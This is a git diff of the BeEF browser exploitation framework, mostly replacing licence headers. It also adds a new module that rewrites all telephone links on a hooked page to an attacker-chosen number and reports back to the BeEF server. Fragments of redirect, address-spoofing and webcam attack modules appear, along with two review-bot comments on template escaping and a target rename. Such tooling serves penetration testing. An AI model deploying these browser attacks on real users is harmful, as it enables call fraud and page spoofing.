@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb b/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb index 61d9e8969..f7e32b6b7 100644 --- a/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb +++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Link_rewrite_sslstrip < BeEF::Core::Command 
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/command.js b/modules/browser/hooked_domain/link_rewrite_tel/command.js
new file mode 100644
index 000000000..355b7ec47
--- /dev/null
+++ b/modules/browser/hooked_domain/link_rewrite_tel/command.js
@@ -0,0 +1,15 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var tel_number = "<%= @tel_number %>";
+ var selector = "a";
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteTelLinks(tel_number, selector)+' telephone (tel) links rewritten to '+tel_number);
+
+});
+
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/config.yaml b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml
new file mode 100644
index 000000000..54c7ef2d9
--- /dev/null
+++ b/modules/browser/hooked_domain/link_rewrite_tel/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ link_rewrite_tel:
+ enable: true
+ category: ["Browser", "Hooked Domain"]
+ name: "Replace HREFs (TEL)"
+ description: "This module will rewrite all the href attributes of telephone links (ie, tel:5558585) to call a number of your choice."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/browser/hooked_domain/link_rewrite_tel/module.rb b/modules/browser/hooked_domain/link_rewrite_tel/module.rb
new file mode 100644
index 000000000..58de13fb5
--- /dev/null
+++ b/modules/browser/hooked_domain/link_rewrite_tel/module.rb
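Review bot: The option value is written into a double-quoted JavaScript string with the raw `<%= %>` tag at `var tel_number = "<%= @tel_number %>";` in link_rewrite_tel/command.js, so a value containing a double quote, backslash or line break produces a command script that no longer parses as intended. The `Number` option declared in link_rewrite_tel/module.rb (the next file in this commit) is free text with no format check, so nothing constrains the value before the template is rendered. prompt_dialog/command.js, visible as context in this same commit, uses the `<%== %>` form for its operator-supplied string, which appears to be the escaping variant; either use the same form here or have the module reject anything other than digits and the dial characters `+`, `*` and `#`. A one-line comment above the assignment, such as `// tel_number is operator input; validated in module.rb before rendering`, would record where that guarantee comes from.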
@@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Link_rewrite_tel < BeEF::Core::Command + + def self.options + return [ + { 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' } + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js b/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js index 48cbdaab1..05d4a3354 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + var somethingsomething = function() { var fake_url = "<%= @fake_url %>"; var real_url = "<%= @real_url %>"; diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml index b4a20fe33..72183d8b6 100644 
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -24,7 +14,7 @@ beef: target: working: S: - os: ["iPhone"] + os: ["iOS"] not_working: ALL: os: ["All"] diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb b/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb index b5f95a712..5c35bc400 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb 
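Review bot: The second hunk of mobilesafari_address_spoofing/config.yaml changes the Safari target from `os: ["iPhone"]` to `os: ["iOS"]`, but the code that compares this string with the detected platform is not part of the hunk. If the detection side still reports `iPhone`, the entry would presumably stop matching and the module would fall under `not_working: ALL`. It is worth confirming that the platform constant was renamed in the same commit, and adding a comment beside the entry, e.g. `# "iOS" must match the OS name reported by browser detection`, so the coupling is visible to whoever edits either side next.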
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Mobilesafari_address_spoofing < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/prompt_dialog/command.js b/modules/browser/hooked_domain/prompt_dialog/command.js index ab02786fb..71c43e538 100644 --- a/modules/browser/hooked_domain/prompt_dialog/command.js +++ b/modules/browser/hooked_domain/prompt_dialog/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var answer = prompt("<%== @question %>","") diff --git a/modules/browser/hooked_domain/prompt_dialog/config.yaml b/modules/browser/hooked_domain/prompt_dialog/config.yaml index 0f9035279..def589af4 100644 --- a/modules/browser/hooked_domain/prompt_dialog/config.yaml +++ b/modules/browser/hooked_domain/prompt_dialog/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/browser/hooked_domain/prompt_dialog/module.rb b/modules/browser/hooked_domain/prompt_dialog/module.rb index 0718acbf9..393cb35f5 100644 --- a/modules/browser/hooked_domain/prompt_dialog/module.rb +++ b/modules/browser/hooked_domain/prompt_dialog/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Prompt_dialog < BeEF::Core::Command diff --git a/modules/browser/hooked_domain/replace_video/command.js b/modules/browser/hooked_domain/replace_video/command.js index 28ca0622f..033fe3e12 100644 --- a/modules/browser/hooked_domain/replace_video/command.js +++ b/modules/browser/hooked_domain/replace_video/command.js 
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() { $j('<%= @jquery_selector %>').each(function(){ var width = $j(this).css('width');
diff --git a/modules/browser/hooked_domain/replace_video/config.yaml b/modules/browser/hooked_domain/replace_video/config.yaml
index f8ddbcda0..8c88b92b4 100644
--- a/modules/browser/hooked_domain/replace_video/config.yaml
+++ b/modules/browser/hooked_domain/replace_video/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/browser/hooked_domain/replace_video/module.rb b/modules/browser/hooked_domain/replace_video/module.rb
index c99c020c4..e5c63c9f1 100644
--- a/modules/browser/hooked_domain/replace_video/module.rb
+++ b/modules/browser/hooked_domain/replace_video/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Replace_video < BeEF::Core::Command
diff --git a/modules/browser/hooked_domain/rickroll/command.js b/modules/browser/hooked_domain/rickroll/command.js
index 2ac24b3eb..331b3ba8a 100644
--- a/modules/browser/hooked_domain/rickroll/command.js
+++ b/modules/browser/hooked_domain/rickroll/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() { $j('body').html('');
diff --git a/modules/browser/hooked_domain/rickroll/config.yaml b/modules/browser/hooked_domain/rickroll/config.yaml
index f86c183fa..9209a0685 100644
--- a/modules/browser/hooked_domain/rickroll/config.yaml
+++ b/modules/browser/hooked_domain/rickroll/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/browser/hooked_domain/rickroll/module.rb b/modules/browser/hooked_domain/rickroll/module.rb
index 920b9065c..66c8fa76a 100644
--- a/modules/browser/hooked_domain/rickroll/module.rb
+++ b/modules/browser/hooked_domain/rickroll/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Rickroll < BeEF::Core::Command
diff --git a/modules/browser/hooked_domain/site_redirect/command.js b/modules/browser/hooked_domain/site_redirect/command.js
index 2c48293fd..27dcd8594 100644
--- a/modules/browser/hooked_domain/site_redirect/command.js
+++ b/modules/browser/hooked_domain/site_redirect/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() { window.location = "<%= @redirect_url %>";
diff --git a/modules/browser/hooked_domain/site_redirect/config.yaml b/modules/browser/hooked_domain/site_redirect/config.yaml
index 3c9681e0a..d1a020585 100644
--- a/modules/browser/hooked_domain/site_redirect/config.yaml
+++ b/modules/browser/hooked_domain/site_redirect/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/browser/hooked_domain/site_redirect/module.rb b/modules/browser/hooked_domain/site_redirect/module.rb
index 25dcee03e..aa178b8df 100644
--- a/modules/browser/hooked_domain/site_redirect/module.rb
+++ b/modules/browser/hooked_domain/site_redirect/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Site_redirect < BeEF::Core::Command
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/command.js b/modules/browser/hooked_domain/site_redirect_iframe/command.js
index f707b25f7..153fa69a6 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/command.js
+++ b/modules/browser/hooked_domain/site_redirect_iframe/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() { var result = 'Iframe successfully created!';
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
index ad73b2efe..1e4d1ac8a 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
+++ b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/browser/hooked_domain/site_redirect_iframe/module.rb b/modules/browser/hooked_domain/site_redirect_iframe/module.rb
index 8ca97afa1..6d25c3aad 100644
--- a/modules/browser/hooked_domain/site_redirect_iframe/module.rb
+++ b/modules/browser/hooked_domain/site_redirect_iframe/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Site_redirect_iframe < BeEF::Core::Command
diff --git a/modules/browser/play_sound/command.js b/modules/browser/play_sound/command.js
index f0c4c7b58..f674c6730 100644
--- a/modules/browser/play_sound/command.js
+++ b/modules/browser/play_sound/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() { function playSound(url) {
diff --git a/modules/browser/play_sound/config.yaml b/modules/browser/play_sound/config.yaml
index 34d95eed7..46e15808a 100644
--- a/modules/browser/play_sound/config.yaml
+++ b/modules/browser/play_sound/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/browser/play_sound/module.rb b/modules/browser/play_sound/module.rb
index ecb66ab2e..6de2fab29 100644
--- a/modules/browser/play_sound/module.rb
+++ b/modules/browser/play_sound/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Play_sound < BeEF::Core::Command
diff --git a/modules/browser/unhook/command.js b/modules/browser/unhook/command.js
index 8ab5edce1..1301e0254 100644
--- a/modules/browser/unhook/command.js
+++ b/modules/browser/unhook/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent unhook request");
diff --git a/modules/browser/unhook/config.yaml b/modules/browser/unhook/config.yaml
index 70885f341..47a88e326 100644
--- a/modules/browser/unhook/config.yaml
+++ b/modules/browser/unhook/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/browser/unhook/module.rb b/modules/browser/unhook/module.rb
index 63f5c8df1..f711022c7 100644
--- a/modules/browser/unhook/module.rb
+++ b/modules/browser/unhook/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Unhook < BeEF::Core::Command
diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js
index 9ed0f73a5..48c2b77ff 100644
--- a/modules/browser/webcam/command.js
+++ b/modules/browser/webcam/command.js
@@ -1,20 +1,11 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() { /*
diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml
index 69f3eb5fb..539e5751a 100644
--- a/modules/browser/webcam/config.yaml
+++ b/modules/browser/webcam/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
